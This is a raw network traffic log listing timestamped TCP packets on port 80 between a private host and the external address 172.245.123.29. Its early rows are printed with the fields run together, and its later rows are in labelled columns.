                                                                      Nov 28, 2024 07:28:11.300067902 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.300081968 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.300121069 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.300307035 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.300319910 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.300332069 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.300343990 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.300384045 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.300421953 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.305962086 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.420274019 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.420310020 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.420423985 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.501163006 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.501223087 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.501224995 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.501264095 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.505326986 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.505378962 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.505454063 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.505492926 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.513714075 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.513772011 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.513881922 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.513947010 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.522175074 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.522236109 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.522250891 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.522289038 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.530560970 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.530623913 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.530677080 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.530711889 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.538980007 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.539026976 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.539113998 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.539148092 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.547364950 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.547413111 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.547457933 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.547489882 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.555743933 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.555793047 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.555856943 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.555886030 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.564166069 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.564208031 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.564301014 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.564336061 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.572658062 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.572738886 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.572740078 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.572772026 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.581146955 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.581213951 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.581221104 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.581255913 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.702673912 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.702759981 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.702785015 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.702821016 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.705224037 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.705270052 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.705322981 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.705358028 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.710369110 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.710427046 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.710465908 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.710500002 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.715540886 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.715635061 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.715651989 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.715687990 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.720612049 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.720659018 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.720751047 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.720787048 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.725764990 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.725810051 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.725886106 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.725924969 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.730838060 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.730876923 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.730935097 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.730967045 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.736012936 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.736068964 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.736130953 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.736167908 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.741113901 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.741169930 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.741195917 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.741233110 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.746184111 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.746206999 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.746239901 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.746256113 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.751282930 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.751338005 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.751377106 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.751421928 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.756448030 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.756504059 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.756556988 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.756618977 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.761584044 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.761647940 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.761693954 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.761739969 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.766645908 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.766690969 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.766760111 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.766936064 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.772244930 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.772320032 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.772404909 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.772454977 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.776926041 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.776976109 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.777029991 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.777086020 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.782067060 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.782121897 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.782164097 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.782211065 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.787175894 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.787205935 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.787246943 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.792256117 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.792304993 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.792349100 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.792387009 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.797514915 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.797558069 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.797700882 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.797743082 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.802417994 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.802463055 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.904155970 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.904206038 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.904264927 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.904295921 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.906105995 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.906142950 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.906228065 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.906258106 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.910243988 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.910296917 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.910360098 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.910396099 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.914346933 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.914390087 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.914454937 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.914484978 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.918437958 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.918489933 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.918611050 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.918648005 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.922405005 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.922446966 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.922521114 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.922553062 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.926263094 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.926311970 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.926450968 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.926489115 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.930094957 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.930143118 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.930171967 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.930207968 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.933820009 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.933861971 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.933938026 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.933974981 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.937618971 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.937668085 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.937746048 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.937777996 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.941349983 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.941416025 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.941459894 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.941494942 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.945067883 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.945122004 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.945122957 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.945149899 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.948816061 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.948874950 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.948908091 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.948940039 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.952568054 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.952635050 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.952661991 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.952689886 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.956347942 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.956398964 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.956429005 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.956459045 CET4916680192.168.2.22172.245.123.29
Timestamp                            Src port  Dst port  Source IP       Dest IP
Nov 28, 2024 07:28:11.960092068 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:11.960150003 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:11.960181952 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:11.960212946 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:11.963831902 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:11.963895082 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:11.963928938 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:11.963959932 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:11.967608929 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:11.967648983 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:11.967706919 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:11.967736959 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:11.971328974 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:11.971368074 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:11.971415043 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:11.971451044 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:11.975081921 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:11.975132942 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:11.975224972 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:11.975256920 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:11.978831053 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:11.978872061 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:11.978935957 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:11.978985071 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:11.982583046 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:11.982624054 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:11.982687950 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:11.982717991 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:11.986346006 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:11.986387014 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:11.986500025 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:11.986536980 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:11.990117073 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:11.990170956 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:11.990228891 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:11.990264893 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:11.993822098 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:11.993884087 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:11.993932009 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:11.993959904 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:11.997585058 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:11.997632980 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:11.997688055 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:11.997716904 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.024235010 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.024405956 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.024413109 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.024447918 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.026135921 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.026181936 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.026251078 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.026290894 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.029835939 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.029877901 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.105469942 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.105551958 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.105669022 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.106853962 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.106910944 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.106961012 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.107001066 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.109738111 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.109778881 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.109841108 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.109879971 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.112639904 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.112692118 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.112725019 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.112756968 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.115434885 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.115475893 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.115549088 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.115586996 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.118205070 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.118252039 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.118302107 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.118338108 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.120973110 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.121015072 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.121064901 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.121100903 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.123681068 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.123725891 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.123814106 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.123857021 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.126357079 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.126415014 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.126439095 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.126477957 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.128869057 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.128907919 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.128976107 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.129012108 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.131494045 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.131547928 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.131596088 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.131633997 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.134130001 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.134175062 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.134244919 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.134284019 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.136751890 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.136804104 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.136867046 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.136903048 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.139384985 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.139431000 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.139512062 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.139604092 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.142018080 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.142061949 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:12.142082930 CET        80     49166  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:12.142124891 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:13.606990099 CET     49166        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:16.578568935 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:16.698635101 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:16.698880911 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:16.699031115 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:16.819048882 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:17.864547014 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:17.864597082 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:17.864609003 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:17.864629984 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:17.864675999 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:17.864752054 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:17.864763021 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:17.864773989 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:17.864787102 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:17.864790916 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:17.864819050 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:17.864855051 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:17.865030050 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:17.865045071 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:17.865056038 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:17.865091085 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:17.865091085 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:17.881278992 CET     49167        80  192.168.2.22    172.245.123.29
